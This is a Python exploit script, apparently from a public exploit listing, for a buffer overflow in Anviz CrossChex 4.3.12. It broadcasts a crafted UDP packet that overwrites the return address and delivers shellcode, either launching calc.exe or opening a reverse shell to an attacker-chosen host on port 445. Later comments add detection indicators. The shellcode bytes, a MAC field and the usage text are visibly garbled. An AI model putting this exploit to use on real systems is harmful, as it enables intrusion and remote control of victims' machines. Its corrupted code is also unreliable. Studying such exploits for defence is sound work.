Anviz CrossChex 4.3.12 – Local Buffer Overflow

– Exploit Details

# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: //www.anviz.com/
# Software Link: //www.anviz.com/download.html
# Version: Crosschex Standard x86 <= V4.3.12
# Tested on: 4.3.8.0, 4.3.12
# CVE : N/A
# More info: //www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html

import socket
import time
import sys
import binascii

# Scapy for the broadcast packet with custom sport
from scapy.all import Raw,IP,Dot1Q,UDP,Ether
import scapy.all

# shellcode working calc.exe
# Three opaque byte-string constants carried over from the original listing,
# each assembled by repeated `+=` concatenation. They are treated here as fixed
# data only: sendFuzzingUDPBroadcast() appends either `calculator_payload` or
# `shell_payload_1 + <packed LHOST> + shell_payload_2` verbatim to its request.
# Defender note: per the listing's own comments the first blob launches
# calc.exe and the other two a reverse shell, so an unexpected child process
# (calc.exe / cmd.exe) of the CrossChex process is the host-side indicator to
# alert on; the network-side indicator is the UDP/5060 datagram built below.
calculator_payload = b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
calculator_payload += b"x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
calculator_payload += b"x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
calculator_payload += b"x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
calculator_payload += b"x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
calculator_payload += b"xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
calculator_payload += b"xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
calculator_payload += b"xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
calculator_payload += b"x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
calculator_payload += b"x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
calculator_payload += b"x5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00"
calculator_payload += b"x00x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5"
calculator_payload += b"xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0a"
calculator_payload += b"x80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53"
calculator_payload += b"xffxd5x63x61x6cx63x2ex65x78x65x00"

# shellcode windows x86 reverse_shell
# First half of the reverse-shell blob; the packed LHOST produced by
# ipToShellcode() is spliced between this and shell_payload_2.
shell_payload_1 = b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
shell_payload_1 += b"x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
shell_payload_1 += b"x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
shell_payload_1 += b"x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
shell_payload_1 += b"x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
shell_payload_1 += b"xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
shell_payload_1 += b"xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
shell_payload_1 += b"xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
shell_payload_1 += b"x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
shell_payload_1 += b"x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
shell_payload_1 += b"x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68"
shell_payload_1 += b"x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8"
shell_payload_1 += b"x90x01x00x00x29xc4x54x50x68x29x80x6bx00"
shell_payload_1 += b"xffxd5x50x50x50x50x40x50x40x50x68xeax0f"
shell_payload_1 += b"xdfxe0xffxd5x97x6ax05x68"

# shellcode windows x86 reverse_shell (part_2)
# Second half of the reverse-shell blob (the usage text at the bottom of the
# file says the callback goes to port 445).
shell_payload_2 = b"x68x02x00x01xbdx89xe6x6ax10x56x57x68x99xa5"
shell_payload_2 += b"x74x61xffxd5x85xc0x74x0cxffx4ex08x75xec"
shell_payload_2 += b"x68xf0xb5xa2x56xffxd5x68x63x6dx64x00x89"
shell_payload_2 += b"xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66"
shell_payload_2 += b"xc7x44x24x3cx01x01x8dx44x24x10xc6x00x44"
shell_payload_2 += b"x54x50x56x56x56x46x56x4ex56x56x53x56x68"
shell_payload_2 += b"x79xccx3fx86xffxd5x89xe0x4ex56x46xffx30"
shell_payload_2 += b"x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56x68"
shell_payload_2 += b"xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0"
shell_payload_2 += b"x75x05xbbx47x13x72x6fx6ax00x53xffxd5"

def ipToShellcode(ip):
  """Render a dotted-quad IPv4 string as raw bytes for splicing into a payload.

  Each of the first four octets is passed through ``hex()`` with its ``0x``
  prefix dropped, and the concatenated digits are decoded with
  ``binascii.unhexlify``. Because ``hex()`` does not zero-pad, an octet below
  16 contributes a single digit, so the result is shorter than four bytes
  (or ``binascii.Error`` is raised when the digit count is odd). Fewer than
  four octets raises ``IndexError``; extra octets are ignored.
  """
  octets = ip.split('.')
  # Exactly four lookups, so a short input fails the same way (IndexError).
  digits = "".join(hex(int(octets[i]))[2:] for i in range(4))
  return binascii.unhexlify(digits)

# sport has to be 5060
def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
    """Build and send the single crafted UDP broadcast datagram via scapy.

    The request is a fixed 269-byte prefix (two long runs of a repeated
    filler byte, a 4-byte return-address overwrite, 4 more filler bytes)
    followed by one of the module-level payload blobs. The frame is sent
    on the interface named by ``sys.argv[1]``; ``sys.argv[2]``, when
    present, selects the reverse-shell payload and supplies the LHOST.

    Args:
        ip: Value written into the IP header's source field. The caller in
            this file passes ``''``; how scapy treats an empty src is not
            shown here.
        sport: UDP source port (default 5050). The comment above this def
            says it has to be 5060, which disagrees with the default and
            with the 5050 port the server in setFuzzUDPServer() binds.
        dport: UDP destination port, 5060 by default.

    Returns:
        None. The only effect is the ``scapy.all.sendp`` call.

    Detection note: a UDP datagram to port 5060 whose payload opens with
    77 bytes of one repeated value and 184 of another is a simple pattern
    for a network signature.
    """
    request = b"A"*77 # Original payload substitute
    request += b"B"*184
    request += b"x07x18x42x00" # EIP - 00421807 crosscheck_standard.exe
    request += b"A"*4
    # 269 bytes

    # Payload selection reads the process-wide argv rather than a parameter.
    if len(sys.argv) > 2:
      request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
    else:
      request = request + calculator_payload

    # NOTE(review): the Ether src literal below looks like extraction residue
    # in this listing (a URL prefixed to a MAC) — confirm against the original.
    scapy.all.sendp( Ether(src="//www.exploit-db.com/00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request),  iface=sys.argv[1] )

def setFuzzUDPServer(ip='', port=5050, timeout=150):
    """Listen on a UDP port and answer the first datagram with the crafted broadcast.

    Args:
        ip: Forwarded unchanged to sendFuzzingUDPBroadcast() as its ``ip``
            argument; the default is the empty string.
        port: UDP port bound on all interfaces.
        timeout: Seconds; used both as the per-recv socket timeout and as
            the overall deadline for the loop.

    Returns:
        A list of the ``(data, address)`` tuples captured by the first
        ``recvfrom`` in each iteration.
    """
    try :
    	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except:
    	# Bare except and no exit: if creation fails, `s` is unbound and the
    	# bind below raises NameError instead of the printed message.
    	print('[!] Failed to create server socket')

    try:
    	s.bind(('', port))
    except:
    	print('[*] Server socket bind failed')
    	sys.exit()

    print('[*] Waiting for crosschex')
    s.settimeout(timeout)
    # `timeout` is rebound from a duration to an absolute deadline here.
    timeout = time.time() + timeout
    responses = []

    while True:
        if time.time() > timeout:
            break
        try:
            response = s.recvfrom(1024)
            print(response)
            responses.append(response)
            sendFuzzingUDPBroadcast(ip=ip)
            # The follow-up datagram overwrites `response` but is never
            # stored or printed.
            response = s.recvfrom(1024)            
        except socket.timeout:
            # A quiet network trips the socket timeout; the message is
            # misleading since nothing is wrong with the server itself.
            print("[!] Error with UDP server")

    s.close()
    return responses

nargs = len(sys.argv)

# Script entry: the interface name (argv[1]) is mandatory; an optional second
# argument is the LHOST that switches the payload from calculator to reverse
# shell. NOTE(review): the usage text appears to have lost characters in this
# listing; it is reproduced as-is.
if nargs <= 1:
    print("[*] Usage: python3 %s  [[]ntif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
    sys.exit(0)

setFuzzUDPServer()
            
